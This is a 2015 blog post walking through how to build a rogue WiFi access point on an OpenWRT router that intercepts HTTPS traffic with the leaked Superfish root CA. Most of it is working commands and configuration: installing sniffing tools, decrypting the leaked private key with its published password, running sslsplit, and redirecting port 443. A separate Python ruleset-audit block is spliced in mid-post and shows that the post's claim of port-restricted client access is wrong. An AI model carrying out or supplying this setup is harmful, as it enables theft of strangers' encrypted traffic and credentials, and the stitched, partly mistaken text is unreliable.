Friday, March 13, 2015

Exploiting Superfish the OpenWRT way

Exploiting the Superfish certificate, the OpenWRT way

As you can read in Robert Graham's post Exploiting the Superfish certificate, you can use a Raspberry Pi to exploit the Lenovo/Superfish certificate.

If you don't have a Raspberry Pi at home you don't need to buy one: I'm sure you have a small router at home on which you can install OpenWRT, plus a USB flash drive. Routers have the advantage that they are built to act as APs.

OpenWRT compatible router

You can find the list of compatible routers here: http://wiki.openwrt.org/toh/start

I bought a pair of TP-Link TL-WR703N routers 2 years ago because they are cheap and small, with 1 USB port, 1 WiFi interface and 1 Ethernet interface. The problem is that they have only 4 MB of flash memory, but we can use a USB flash drive to extend the filesystem.

USB Storage

To extend the filesystem we need to install some modules; follow the instructions from the OpenWrt Wiki.

If you don't have enough space to install these modules you'll need to build a custom OpenWRT image.
Don't worry, there is an image generator, so you don't have to deal with difficult compilation processes.
You only have to:

  • Download the image generator for your router architecture
  • Uncompress it
  • cd into the directory and run:
  • make image PROFILE='profile of your router' PACKAGES='kmod-usb-storage block-mount kmod-fs-ext4'
  • flash the router with the image found in the ./bin/<architecture>/ directory.

Once the router is flashed we need to mount the USB drive; remember that it has to be formatted with an ext4 filesystem.

When you plug in the USB drive you need to find its partition and mount it:

root@OpenWRT:~$ cat /proc/partitions
major minor  blocks  name

  31        0        128 mtdblock0
  31        1       1081 mtdblock1
  31        2       2822 mtdblock2
  31        3        704 mtdblock3
  31        4         64 mtdblock4
  31        5       3904 mtdblock5
   8        0    3929088 sda
   8        1    3924472 sda1

root@OpenWRT:~$ mkdir /mnt/usb

You have to add these lines to the fstab file:

#/etc/config/fstab
config mount
        option target '/mnt/usb'
        option enabled '1'
        option device '/dev/sda1'
        option fstype 'ext4'

and add this line to /etc/opkg.conf (the destination must be the mount point used in fstab):

dest usb /mnt/usb

You can then install all the packages you want to turn the router into a hacker tool ;)

root@OpenWRT:~$ opkg update
root@OpenWRT:~$ opkg install -d usb wireless-tools tcpdump dsniff aircrack-ng ngrep autossh

Some packages need a small tweak so they can find their files; you can solve it with these lines in /etc/rc.local:

ln -s /mnt/usb/usr/sbin/iwconfig /usr/bin/iwconfig
ln -s /mnt/usb/usr/sbin/iwpriv /usr/bin/iwpriv
ln -s /mnt/usb/usr/sbin/iwlist /usr/bin/iwlist
ln -s /mnt/usb/usr/lib/dsniff.services /usr/lib/dsniff.services

Fake AP

Once the router is flashed with the new image and the USB storage is working, we need to set up the fake routed AP.

You need to modify 3 files:

  • The network file with network settings
#/etc/config/network
config interface 'loopback'
        option ifname 'lo'
        option proto 'static'
        option ipaddr '127.0.0.1'
        option netmask '255.0.0.0'

config interface 'wan'
        option ifname 'eth0'
        option type 'bridge'
        option _orig_ifname 'eth0'
        option _orig_bridge 'true'
        option proto 'dhcp'
        option hostname 'superfishAP.local'

config 'interface' 'wifi'
        option 'proto'      'static'
        option 'ipaddr'     '192.168.2.1'
        option 'netmask'    '255.255.255.0'
  • The dhcp file to configure a dhcp server for the AP
#/etc/config/dhcp
config dnsmasq
        option domainneeded '1'
        option boguspriv '1'
        option localise_queries '1'
        option rebind_protection '1'
        option rebind_localhost '1'
        option local '/lan/'
        option domain 'lan'
        option expandhosts '1'
        option readethers '1'
        option leasefile '/tmp/dhcp.leases'
        option resolvfile '/tmp/resolv.conf.auto'

config dhcp 'wifi'
        option interface 'wifi'
        option start '100'
        option limit '150'
        option leasetime '1h'

config dhcp 'wan'
        option interface 'wan'
        option ignore '1'

config odhcpd 'odhcpd'
        option maindhcp '0'
        option leasefile '/tmp/hosts/odhcpd'
        option leasetrigger '/usr/sbin/odhcpd-update'
  • The firewall file:

I disabled the firewall scripts (/etc/init.d/firewall disable) because I prefer to use plain iptables rules. You need to create the file /etc/iptables.rules and load it using:
iptables-restore < /etc/iptables.rules

#/etc/iptables.rules
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 192.168.2.0/24 ! -d 192.168.1.0/24 -o br-wan -j MASQUERADE
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*raw
:PREROUTING ACCEPT [1050:140052]
:OUTPUT ACCEPT [512:153008]
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*mangle
:PREROUTING ACCEPT [1050:140052]
:INPUT ACCEPT [790:68328]
:FORWARD ACCEPT [245:70278]
:OUTPUT ACCEPT [512:153008]
:POSTROUTING ACCEPT [757:223286]
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i br-wan -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i br-wan -p udp -m udp --dport 68:69 -j ACCEPT
-A INPUT -i br-wan -p icmp -j ACCEPT
-A INPUT -i wlan0 -p udp -m udp --dport 67:68 -j ACCEPT
-A INPUT -i wlan0 -p udp -m udp --dport 53 -j ACCEPT
-A FORWARD -s 192.168.2.0/24 ! -d 192.168.1.0/24 -i wlan0 -o br-wan -j ACCEPT
-A FORWARD ! -s 192.168.1.0/24 -d 192.168.2.0/24 -i br-wan -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 25 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 110 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Thu Mar  5 19:30:56 2015

These rules permit internet access only to ports 25, 80, 110 and 443 from WiFi clients.
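As an added check that is not part of the original post: a small Python audit that parses iptables-save text like the ruleset above and lists which new flows each filter chain admits, so a port restriction can be verified instead of assumed. Run on the rules shown, it reports that the wlan0 to br-wan FORWARD rule carries no -p/--dport match (WiFi clients are forwarded on any port), while the 25/80/110/443 list only appears in OUTPUT, which governs the router's own traffic. The sample ruleset is a constructed excerpt of the post's filter table.

```python
import re

# Constructed sample input: an excerpt of the post's filter table.
RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A FORWARD -s 192.168.2.0/24 ! -d 192.168.1.0/24 -i wlan0 -o br-wan -j ACCEPT
-A FORWARD ! -s 192.168.1.0/24 -d 192.168.2.0/24 -i br-wan -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
"""

# One "-opt value" / "--long-opt value" token as iptables-save writes them; a
# leading "!" (negation) is skipped because it never changes a port/interface match.
OPT = re.compile(r"(?:!\s+)?(-[A-Za-z]|--[a-z-]+)\s+(\S+)")

def parse_rules(text):
    """Return ({(table, chain): policy}, [rule dicts]) from iptables-save text."""
    policies, rules, table = {}, [], None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[(table, chain)] = policy
        elif line.startswith("-A "):
            rule = {"table": table}
            for opt, val in OPT.findall(line):
                rule["chain" if opt == "-A" else opt.lstrip("-")] = val
            rules.append(rule)
    return policies, rules

def new_flows_allowed(policies, rules, chain, in_if=None, out_if=None):
    """(proto, dport) pairs a NEW connection may use through `chain` of the filter
    table; ('any', 'any') means a rule or the chain policy accepts with no port match."""
    allowed = set()
    for r in rules:
        if (r["table"], r.get("chain"), r.get("j")) != ("filter", chain, "ACCEPT"):
            continue
        if (in_if and r.get("i") != in_if) or (out_if and r.get("o") != out_if):
            continue
        if "state" in r and "NEW" not in r["state"].split(","):
            continue  # RELATED,ESTABLISHED only: replies, never a new flow
        allowed.add((r.get("p", "any"), r.get("dport", "any")))
    if policies.get(("filter", chain)) == "ACCEPT":
        allowed.add(("any", "any"))
    return allowed
```

Feed it the output of `iptables-save` from the router to audit the live ruleset rather than the sample.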

To make it persistent, add this line to /etc/rc.local:

/usr/sbin/iptables-restore < /etc/iptables.rules

SSL interception

Ok, we have a working AP where we can sniff all traffic except SSL.

The only tool that worked for me was sslsplit, but there isn't an official package. You have to download the unofficial binary from https://github.com/ShaPOC/ProjectGhost/blob/master/software/sslsplit/bin/sslsplit; I stored it in /mnt/usb/usr/bin/.

The next steps are:

  • Create a directory /mnt/usb/sslsplit and cd into it.
  • Create a directory /mnt/usb/sslsplit/log.
  • Download the file test.pem from https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
  • Decrypt the file using the password "komodia"
    openssl rsa -in test.pem -out ca.key
  • Copy the file test.pem to ca.cer and then remove the PRIVATE KEY section
    sed '/-----BEGIN ENCRYPTED PRIVATE KEY-----/,/-----END ENCRYPTED PRIVATE KEY-----/d' test.pem > ca.cer

You can start the MiTM with:

sslsplit -D -l connections.log -S /mnt/usb/sslsplit/log -k ca.key -c ca.cer ssl 0.0.0.0 8443

but don't forget to redirect all SSL traffic:

iptables -t nat -i wlan0 -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8443

And that's it! All normal traffic goes through like on a normal WiFi access point, but SSL traffic on port 443 gets MitMed with the Superfish CA!